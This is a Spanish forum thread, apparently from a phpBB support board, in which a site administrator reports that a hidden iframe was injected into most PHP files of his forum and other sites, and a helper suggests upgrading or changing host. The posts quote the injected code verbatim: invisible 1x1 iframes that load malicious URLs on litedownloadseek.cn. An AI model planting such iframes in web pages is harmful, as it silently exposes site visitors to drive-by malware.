hackeo en la version 2.0.22 - 2.0.23 ?

[gruposriojanos]

foro bajo linux de pago. http://www.gruposriojanos.com/foro" onclick="window.open(this.href);return false; 3 años sin dar problemas
mods. ver videos de youtube, subir archivos adjuntos, topics anyware.


saludos. hace tiempo que os leía pero habia solucionado los problemas con el buscador, ahora me toca dar un poco la brasa XD.
se trata de un foro instalado en un linux de pago que no ha tenido excesivos problemas en 3 años. siempre la misma version 2.0.22

ayer por la tarde detecté ciertas anomalias . es deci. no funcionaba... XD. asi que me puse a comparar ficheros con la copia de seguridad que tengo guardada, de esta forma me salió una linea de codigo que poniendola por internet parece ser una especie de hackeo que acaba de salir.
esta linea de codigo estaba añadida en el 90% de los ficheros php. no sé si se trataba de un bug de esta version de foro o es que me han hackeado el ftp. de todas formas el resto de la informacion estaba intacta. asi que creo que fue algo de la version de los foros. ¿ a ver si alguno sabeis algo ?
en fin, que visto que podia haber problemas cambie todos los pass del ftp y me puse a actualizar a la version 2.0.23. Todavia no me encuentro con fuerzas para pasar toda la info a la 3.
esta es la linea maldita :
src =" http://litedownloadseek.cn/in.cgi?cocacola5" onclick="window.open(this.href);return false;" width=1 height=1 style=" visibility: hidden"

el asunto es que segui la actualizacion "abriendo" "buscando" y "reemplazando" del fichero de texto de actualizacion de turno. y ya tengo la versoin 2.0.23 . pero no estoy seguro ya de que tenga todo correcto ¿ alguna sugerencia ?
gracias.

[gruposriojanos]

foro bajo linux de pago. http://www.gruposriojanos.com/foro" onclick="window.open(this.href);return false; 3 años sin dar problemas
mods. ver videos de youtube, subir archivos adjuntos, topics anyware.


saludos. hace tiempo que os leía pero habia solucionado los problemas con el buscador, ahora me toca dar un poco la brasa XD.
se trata de un foro instalado en un linux de pago que no ha tenido excesivos problemas en 3 años. siempre la misma version 2.0.22

ayer por la tarde detecté ciertas anomalias . es deci. no funcionaba... XD. asi que me puse a comparar ficheros con la copia de seguridad que tengo guardada, de esta forma me salió una linea de codigo que poniendola por internet parece ser una especie de hackeo que acaba de salir.
esta linea de codigo estaba añadida en el 90% de los ficheros php. no sé si se trataba de un bug de esta version de foro o es que me han hackeado el ftp. de todas formas el resto de la informacion estaba intacta. asi que creo que fue algo de la version de los foros. ¿ a ver si alguno sabeis algo ?
en fin, que visto que podia haber problemas cambie todos los pass del ftp y me puse a actualizar a la version 2.0.23. Todavia no me encuentro con fuerzas para pasar toda la info a la 3.
esta es la linea maldita :
src =" http://litedownloadseek.cn/in.cgi?cocacola5" onclick="window.open(this.href);return false;" width=1 height=1 style=" visibility: hidden"

el asunto es que segui la actualizacion "abriendo" "buscando" y "reemplazando" del fichero de texto de actualizacion de turno. y ya tengo la versoin 2.0.23 . pero no estoy seguro ya de que tenga todo correcto ¿ alguna sugerencia ?
gracias.

actualizo DATOS:
URL: http://www.gruposriojanos.com/foro" onclick="window.open(this.href);return false;
Plantilla(s) usuada(s): por defecto
MODs instalados: ver videos de youtube, subir archivos adjuntos, topics anyware.
Versión de phpBB: 2.0.23
Servidor: linux de pago
Si es una actualización desde otra versión: ahora es una actualizacion desde la 2.0.22
Si es una conversión desde otro tipo de Foro: no. instalacion limpia hace unos añitos.

[HuanManwe]

Si usaste el code_change para actualizar de la .22 a la .23 entonces supongo que lo has hecho bien y has actualizado esa versión.

De todos modos te recomiendo que actualices a la versión 3 lo antes posible, porque en no mucho tiempo no habrá soporte a versiones 2.x , al menos en la web oficial ya no dan soporte a la versión anterior. Aquí sí, de momento, pero es MUY aconsejable actualizar.

[gruposriojanos]

hola.
pues de momento la actualizacion a 2.23 me va bien. pero me siguen apareciendo esas lineas maliciosas de codigo. y eso que en el ordenador no tengo ningun malware ni virus. acabo de pasar distintos programas.

PD. ¿ hay algun antivirus o alguna forma de pasar un antivirus por FTP al host ? imagino que la empresa contratada lo tienen corriendo, pero solo te avisan de que tienes codigo malicioso . no te lo borran. el los servers dedicados si que controlas tu el antivirus, y spyware, pero aqui no se puede hacer nada. imgino que tb habrá antivirus que chequeen lineas de codigo en scrips no ?.
un saludo y gracias por los consejos.

[HuanManwe]

El problema es que es posible que haya ya algún script que hackee los foros phpBB 2.0.23, así que razón de más para pasarte a la versión 3, ya que el phpBB Group NO va a seguir desarrollando el phpBB2, y solo se centrará en la nueva versión 3. Por lo tanto la versión 2.0.23 es vulnerable y seguramente lo seguirá siendo para siempre.

Mantener un foro en versión 2 es una locura, en tu caso, porque ya sabes que algún hacker tiene acceso a tu foro, y aunque eliminaras esas líneas podría volverlas a poner cuando quisiera.

No hay ningún antivirus que escanee un ftp (que yo sepa), a no ser que esté directamente instalado en el servidor, pero eso es cosa de tu proveedor.

[gruposriojanos]

hola, gracias por involucrarte en el problema.
bueno, después de subir muuchos gigas de informacion al server esta mañana ha vuelto a aparecer la famosa linea de codigo. en este caso aparece un poco retocada , pero vamos ahi esta.
habia limpiado todo, y habia cambiado passwords de acceso de los ftps, asi como otro webmaster que tb estaba sufriendo este ataque ( en este caso el tiene la version 3 de los phpbb ). asi que de momento queda descartado que el ataque sea una vulnerabilidad del foro ( aunque lo cambiare en breve ).
no se de donde puede venir ya el fallo de seguridad, ya que el server dice que ellos no tienen el problema. ademas lo estoy viendo en diferentes host, tanto en italianos de la empresa aruba como en yanquis donde tengo otras webs.

primeros dias del ataque
<iframe src="http://litedownloadseek.cn/in.cgi?cocacola8" width=1 height=1 style="visibility: hidden"></iframe>

pasados unos dias el codigo es
<iframe src="http://litedownloadseek.cn/in.cgi?cocacola15" width=1 height=1 style="visibility: hidden"></iframe>

y tb hace referencia a la web : alink.belstom.ru

bueno, ahi queda eso.
si algun admin quiere cambiar el titulo y el post a otro lugar mas conveniente, que lo haga.
y si alguien tiene algun consejo mas, o sabe de donde y como viene este ataque, se agradecerá ...

[HuanManwe]

Si ese problema se da en aruba, aparece en webs que tienen diferentes tipos de aplicaciones (no solo foros phpBB, sino html simple, páginas en php, etc...) quiere decir que es un problema de aruba, que tiene un agujero de seguridad. Apostaría por eso.

Lógicamente ellos dirán que es un problema de los usuarios en particular, que no tienen protegidos sus espacios web. Tratan de quitarse el muerto de encima.

¿Recomendación? Hay dos posibilidades:
1.- esperas a que ellos corrijan el fallo y te armas de paciencia, borrando ese código de tus páginas a menudo.
2.- te vas a otro servidor

[gruposriojanos]

bueno, pues sigo recopilando toda la informacion posible para cuando os toque a vosotros XD.
tengo webs en direfentes servires, reseal, hostinet, aruba, arsys .etc. Y unas han caido y otras no. asi que es un problema internacional.
aporto mas datos
http://translate.google.com/translate?p ... ry_state0=" onclick="window.open(this.href);return false;
es una traduccion del ruso. donde explica alguna web rusa que ha sido atacada el 11 de enero. tambien he estado leyendo info de algunas webs suecas. por lo que he deducido se trata de alguna variante de este amiguito. "Exploit.HTML.IFrame-6"

un saludo y suerte a los infectados.